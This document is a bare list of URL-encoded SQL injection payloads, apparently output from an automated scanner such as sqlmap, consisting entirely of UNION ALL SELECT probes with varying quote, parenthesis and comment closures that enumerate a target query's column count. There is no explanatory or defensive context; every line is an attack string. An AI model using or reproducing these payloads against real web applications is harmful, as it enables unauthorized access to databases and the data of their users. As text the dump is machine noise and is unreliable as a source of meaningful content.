1234.5%27%20WHERE%203705%3D3705%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20WHERE%204445%3D4445%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%206884%3D6884%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%209492%3D9492%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%202375%3D2375%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%209486%3D9486%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%209310%3D9310%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%201751%3D1751%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%207563%3D7563%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%201560%3D1560%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%202618%3D2618%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20WHERE%202298%3D2298%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%201314%3D1314%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%201065%3D1065%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%204034%3D4034%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%202926%3D2926%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%209730%3D9730%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%206945%3D6945%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%203034%3D3034%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%208892%3D8892%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%206620%3D6620%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%20WHERE%206502%3D6502%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27idYc%27%20FROM%20DUAL%20WHERE%204806%3D4806%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27Wtit%27%20FROM%20DUAL%20WHERE%205137%3D5137%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27stvd%27%20FROM%20DUAL%20WHERE%203891%3D3891%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27dtUC%27%20FROM%20DUAL%20WHERE%203123%3D3123%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27RkIP%27%20FROM%20DUAL%20WHERE%205102%3D5102%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27VtDe%27%20FROM%20DUAL%20WHERE%201785%3D1785%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27bQyl%27%20FROM%20DUAL%20WHERE%209095%3D9095%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27wkRD%27%20FROM%20DUAL%20WHERE%209142%3D9142%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27TXiv%27%20FROM%20DUAL%20WHERE%209154%3D9154%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27xjtT%27%20FROM%20DUAL%20WHERE%209896%3D9896%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27jogh%27%20WHERE%202492%3D2492%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27evEp%27%20WHERE%201534%3D1534%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27DRLJ%27%20WHERE%204320%3D4320%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27EJTc%27%20WHERE%209997%3D9997%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27Ymnp%27%20WHERE%204623%3D4623%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27ZnmY%27%20WHERE%209580%3D9580%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27tIIm%27%20WHERE%209107%3D9107%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27xLCW%27%20WHERE%207379%3D7379%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27Dymy%27%20WHERE%201691%3D1691%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27dhEJ%27%20WHERE%206437%3D6437%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20GtXb%20WHERE%201927%3D1927%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20qjLW%20WHERE%204579%3D4579%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20PofY%20WHERE%202522%3D2522%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20WEpr%20WHERE%208197%3D8197%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20Bkwk%20WHERE%206106%3D6106%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20SyOd%20WHERE%202006%3D2006%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20KGoe%20WHERE%207317%3D7317%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20HGfn%20WHERE%204038%3D4038%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20nwvb%20WHERE%203469%3D3469%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20unae%20WHERE%202156%3D2156%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27ogJe%27%20WHERE%209274%3D9274%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27GHeo%27%20WHERE%203800%3D3800%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27hPOb%27%20WHERE%201180%3D1180%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27RwBk%27%20WHERE%209406%3D9406%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27PseW%27%20WHERE%207595%3D7595%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27OKCQ%27%20WHERE%202886%3D2886%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27FISK%27%20WHERE%204061%3D4061%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27JGsF%27%20WHERE%202808%3D2808%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27FXmB%27%20WHERE%205191%3D5191%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27oLqm%27%20WHERE%203479%3D3479%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 -5055%29%20UNION%20ALL%20SELECT%208599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%2C8599%23 -1380%29%20UNION%20ALL%20SELECT%205660%2C5660%2C5660%2C5660%2C5660%2C5660%2C5660%2C5660%2C5660%2C5660%2C5660%2C5660%23 -7746%29%20UNION%20ALL%20SELECT%207252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%2C7252%23 -7093%29%20UNION%20ALL%20SELECT%201636%2C1636%2C1636%2C1636%2C1636%2C1636%2C1636%2C1636%2C1636%2C1636%2C1636%2C1636%2C1636%2C1636%23 -5446%29%20UNION%20ALL%20SELECT%201000%2C1000%2C1000%2C1000%2C1000%2C1000%2C1000%2C1000%2C1000%2C1000%2C1000%2C1000%2C1000%2C1000%2C1000%23 -7408%29%20UNION%20ALL%20SELECT%201996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%23 -3030%29%20UNION%20ALL%20SELECT%208399%2C8399%2C8399%2C8399%2C8399%2C8399%2C8399%2C8399%2C8399%2C8399%2C8399%2C8399%2C8399%2C8399%2C8399%2C8399%2C8399%23 -5274%29%20UNION%20ALL%20SELECT%206201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%2C6201%23 -9860%29%20UNION%20ALL%20SELECT%207674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%2C7674%23 -6912%29%20UNION%20ALL%20SELECT%204580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%2C4580%23 -9556%27%29%20UNION%20ALL%20SELECT%207579%2C7579%2C7579%2C7579%2C7579%2C7579%2C7579%2C7579%2C7579%2C7579%2C7579%23 -1450%27%29%20UNION%20ALL%20SELECT%203311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%23 -8588%27%29%20UNION%20ALL%20SELECT%207443%2C7443%2C7443%2C7443%2C7443%2C7443%2C7443%2C7443%2C7443%2C7443%2C7443%2C7443%2C7443%23 -2210%27%29%20UNION%20ALL%20SELECT%204656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%23 -6776%27%29%20UNION%20ALL%20SELECT%204892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%2C4892%23 -6133%27%29%20UNION%20ALL%20SELECT%209851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%23 -7451%27%29%20UNION%20ALL%20SELECT%206367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%2C6367%23 -5839%27%29%20UNION%20ALL%20SELECT%208451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451%2C8451%23 -2965%27%29%20UNION%20ALL%20SELECT%208276%2C8276%2C8276%2C8276%2C8276%2C8276%2C8276%2C8276%2C8276%2C8276%2C8276%2C8276%2C8276%2C8276%2C8276%2C8276%2C8276%2C8276%2C8276%23 -4536%27%29%20UNION%20ALL%20SELECT%204229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%23 -6561%27%20UNION%20ALL%20SELECT%207598%2C7598%2C7598%2C7598%2C7598%2C7598%2C7598%2C7598%2C7598%2C7598%2C7598%23 -9564%27%20UNION%20ALL%20SELECT%209544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%23 -1245%27%20UNION%20ALL%20SELECT%201970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%2C1970%23 -4107%27%20UNION%20ALL%20SELECT%207046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%2C7046%23 -5911%27%20UNION%20ALL%20SELECT%207018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%2C7018%23 -9727%27%20UNION%20ALL%20SELECT%209488%2C9488%2C9488%2C9488%2C9488%2C9488%2C9488%2C9488%2C9488%2C9488%2C9488%2C9488%2C9488%2C9488%2C9488%2C9488%23 -4514%27%20UNION%20ALL%20SELECT%209121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%2C9121%23 -9247%27%20UNION%20ALL%20SELECT%202597%2C2597%2C2597%2C2597%2C2597%2C2597%2C2597%2C2597%2C2597%2C2597%2C2597%2C2597%2C2597%2C2597%2C2597%2C2597%2C2597%2C2597%23 -8620%27%20UNION%20ALL%20SELECT%201434%2C1434%2C1434%2C1434%2C1434%2C1434%2C1434%2C1434%2C1434%2C1434%2C1434%2C1434%2C1434%2C1434%2C1434%2C1434%2C1434%2C1434%2C1434%23 -8073%27%20UNION%20ALL%20SELECT%201798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%2C1798%23 -1288%22%20UNION%20ALL%20SELECT%206110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%2C6110%23 -7258%22%20UNION%20ALL%20SELECT%202001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%2C2001%23 -9955%22%20UNION%20ALL%20SELECT%209813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%2C9813%23 -3953%22%20UNION%20ALL%20SELECT%205106%2C5106%2C5106%2C5106%2C5106%2C5106%2C5106%2C5106%2C5106%2C5106%2C5106%2C5106%2C5106%2C5106%23 -4913%22%20UNION%20ALL%20SELECT%205545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%23 -1251%22%20UNION%20ALL%20SELECT%203218%2C3218%2C3218%2C3218%2C3218%2C3218%2C3218%2C3218%2C3218%2C3218%2C3218%2C3218%2C3218%2C3218%2C3218%2C3218%23 -5489%22%20UNION%20ALL%20SELECT%202471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%23 -5409%22%20UNION%20ALL%20SELECT%207441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%2C7441%23 -8145%22%20UNION%20ALL%20SELECT%204303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%23 -6577%22%20UNION%20ALL%20SELECT%205278%2C5278%2C5278%2C5278%2C5278%2C5278%2C5278%2C5278%2C5278%2C5278%2C5278%2C5278%2C5278%2C5278%2C5278%2C5278%2C5278%2C5278%2C5278%2C5278%23 -6353%29%20UNION%20ALL%20SELECT%201189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%2C1189%23 -7572%29%20UNION%20ALL%20SELECT%208449%2C8449%2C8449%2C8449%2C8449%2C8449%2C8449%2C8449%2C8449%2C8449%2C8449%2C8449%23 -3021%29%20UNION%20ALL%20SELECT%207999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%2C7999%23 -9363%29%20UNION%20ALL%20SELECT%206365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%23 -9655%29%20UNION%20ALL%20SELECT%204303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%2C4303%23 -4944%29%20UNION%20ALL%20SELECT%202057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%23 